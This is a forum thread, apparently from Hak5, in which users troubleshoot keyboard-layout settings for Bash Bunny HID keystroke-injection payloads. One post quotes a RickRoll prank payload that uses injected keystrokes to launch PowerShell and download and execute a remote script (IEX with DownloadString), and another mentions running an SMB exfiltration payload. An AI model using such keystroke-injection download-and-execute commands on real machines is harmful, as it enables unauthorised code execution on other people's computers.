Other keyboard layouts

[aramansky]

Hello everyone,

I want to use my bashbunny with other keyboard layouts to execute some powershell code (via quack) on a windows box. 

How do i specify another keyboard layout?

Where can i get the /root/tools/languages/de.json (and ch, at, si, hr, pl) or other json files for any other keyboard layout?

 

Thank you very much!

 

[Mr.Pupp3T]

5 hours ago, aramansky said:

Hello everyone,

I want to use my bashbunny with other keyboard layouts to execute some powershell code (via quack) on a windows box. 

How do i specify another keyboard layout?

Where can i get the /root/tools/languages/de.json (and ch, at, si, hr, pl) or other json files for any other keyboard layout?

 

Thank you very much!

 

 

So like you want the BB to type in Russian or Chinese, is that what you mean sir?

[Blix]

What s/he means is that in order to use the Bunny at all, for any HID-based experiments, one needs to have ones local keyboard mapping, or else or experiments (payloads) provided with the BB will fail, since all special characters will be different.

E.g. if I run a script with some flags like "-nop -hidden -didden", then instead of this, the following will be the output "+nop +hidden +didden". Same for / # " = - : and so on, so you can imagine.

Also, it is not possible to change the target system language and input to US, since because of difference of ANSI and ISO keyboards standards yet some small number of special characters will still be different.

Therefore, s/he needs to under stand two things:

1) How to I set Another laungage is the payload, and

2) Where are any already existing keyboard layout files that are to be put under /root/tools/languages?

/Blix

[Decoy]

If you're in the HID attack mode, you can set your keyboard like so:

Q SET_LANGUAGE DE

Or US, and so on, and so forth.

[Decoy]

This is a link to the Rubber Ducky resources folder:

https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Encoder/resources

This will show you the available keyboard layouts.

[Blix]

Thank you Decoy! Appreciated! /Blix

[Blix]

48 minutes ago, Decoy said:

This is a link to the Rubber Ducky resources folder:

https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Encoder/resources

This will show you the available keyboard layouts.

Well, but the format of these files are not suitable for the BB, correct. This is only for the Rubber Ducky. I looked at the us.json file on the BB and that specifies the keys with a six digit code like 02:00:15 (meaning e.g. shift plus key 15 on a US keyboard).

Is there a repository with json BB keyboard files for the bashbunny? If not, would it be possible for someone at Hak5 to convert all these so that thousands of hours worth of good work around the globe is not wasted (if we all have to do this manually).

/Blix

[Decoy]

I'm pretty sure all of those keyboards are already available for the bash bunny, and I linked it as a reference only. So you can set to any of those languages as I've shown above, using the first 2 letters from each resource.

[Blix]

Hi,

I checked carefully, tested 10 different language setting and examined the us.json file in root tools languages. Since there are no other files, I guess it is safe to say those keyboards are not availale for the BB.

Suggestion: Can we have a forum or subforum with language files?

Is there anyone else out there struggling with this? I have spent at least 20 hours on this language problem so far. Any solutions?

/Blix

[Blix]

Quote

Aha, there is a payload called DuckyInstall in the BB payloads here https://github.com/hak5darren/bashbunny-payloads/tree/master/payloads/library/DuckyInstall that results in languages being installed! FINALLY some good news. If this does not work, I WILL BE QUACKKKK!

 

[Decoy]

I forgot about that. I just installed all the tools and everything when I first got the BB and never gave it much thought after that.

[Blix]

Hi Decoy and friends,

As said above, you can install DuckyInstall by putting it at a switch as a payload and run it. This results in that the following language files are put here

root@bunny:~/tools/DuckToolkit/ducktoolkit/languages# ls
be.json  ca.json  de.json  es.json  fr.json  hr.json  no.json  se.json  us.json
br.json  ch.json  dk.json  fi.json  gb.json  it.json  pt.json  si.json

What I did was to copy the needed .json file (change xx to your language) into the following location in the BB:

root@bunny:~/tools/DuckToolkit/ducktoolkit/languages# cp xx.json /root/tools/languages/

Now, you can use the following in the payload scripts after the ATTACKMODE HID command (Exchange XX with the laungage letters of the xx.json file you copied:

Q SET_LANGUAGE XX

I have tried this and for the FIRST time I managed to get a payload to run! Yippie! The payload I tested with was "Faster SMB Exfiltrator" from Darren of Hak5. It worked! Of course, you need to install the tools (run tools-installer just as any payload, put it on a switch and run it) and also log in to the BB using a terminal and from the impacket folder and run "python setup.py install" Before. After that, it hopefully will work!

/Blix

Edited April 2, 2017 by Blix

[FredHilbert]

On 02/04/2017 at 2:37 PM, Blix said:

Hi Decoy and friends,

As said above, you can install DuckyInstall by putting it at a switch as a payload and run it. This results in that the following language files are put here

 

Hi Blix

I tried to install CH and BE keyboard. But when I put Duckyinstall in Switch1 folder and execute it, nothing append. Can I launch install.sh manually direct from ssh console ?

(sorry for my english)

Thank you.

[f3r]

Hello ,

You have to use this inside the your "payload.txt":

DUCKY_LANG fr

 

[FredHilbert]

On 30/04/2017 at 10:24 PM, f3r said:

Hello ,

You have to use this inside the your "payload.txt":

DUCKY_LANG fr

 

Thank you for your answer.

But where in the payload ?

I've tried in the RickRoll prank payload at different location but the Powershell command is still writing in US layout.

# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started starting the rickroll
# Green..............RickRoll Started, Safe to pull

LED B 200
ATTACKMODE HID
DUCKY_LANG CH
Q GUI r
Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\"" 
Q DELAY 300
Q ENTER


ATTACKMODE RNDIS_ETHERNET
source bunny_helpers.sh
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
cd $payload_dir
LED R G B 200
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
pid=$!
while ! nc -z localhost 80; do sleep 0.2; done
sleep 3
LED G 200
kill -9 $pid
exit

 

[Marcussen]

Have you guys found a solution to this?

I'm running 1.3 firmware, and unable to get the Bunny to use Danish layout. I've used the DUCKY_LANG xx in my script, and also set it in the config file. I have tried upper and lowercase, but still the same. No Danish special characters and hence, not able to use the scripts.

I have all the json files in the language folder. Do I need to do anything else to get this to work?

Thanks

[RazerBlade]

You need to set your language to Swedish. Then it will work.

[FredHilbert]

6 hours ago, Marcussen said:

Have you guys found a solution to this?

I'm running 1.3 firmware, and unable to get the Bunny to use Danish layout. I've used the DUCKY_LANG xx in my script, and also set it in the config file. I have tried upper and lowercase, but still the same. No Danish special characters and hence, not able to use the scripts.

I have all the json files in the language folder. Do I need to do anything else to get this to work?

Thanks

No sorry. Never find how to set correctly for our French-Switzerland keyboard layout.

[Dave-ee Jones]

The argument you are passing to DUCKY_LANG is a .json file in the languages folder in '/root/udisk/languages'.
E.g. 'DUCKY_LANG us' refers to '/root/udisk/languages/us.json'

So if you are trying to set your language, make sure it is in the languages folder first.
Also, best practice is to set the language in the 'config.txt' file on the USB (next to the 'languages' folder).

Check your 'version.txt' to make sure you have firmware 1.3 as well.

[Marcussen]

Thanks for the replies. Here's where I'm at.

1: Resat the Bash Bunny using the 3 pull-out method and got back to 1.0. At this point Ducky was working using the old methods of choosing language.

2: Updated to 1.3 by downloading the file, checking hash, and copying it to the root, safely eject and reinsert in arm mode.

cat version.txt shows 1.3_264

At this point NO ducky language is working. Nothing is written on screen. Here's my very simple payload:

ATTACKMODE HID

Q STRING notepad.exe c:\
Q ENTER

Nothing is written in a open gedit file on Ubuntu, nor notepad on Windows 10.

Is there a way to COMPLETELY clear the Bunny and start all over, or what is going on here?

Am I missing something after the upgrade?

After having mounted the nandf and checked in root/udisk/languages all the language.json files are there. I have tried setting both us, da and se in the config.txt. Still nothing.

When SSH'ing in and not having run the mount command, there is no language folder (or any other folders) in /root/udisk/ <- but it's supposed to be that way, right?

I'm kinda lost here guys...

Thanks in advance.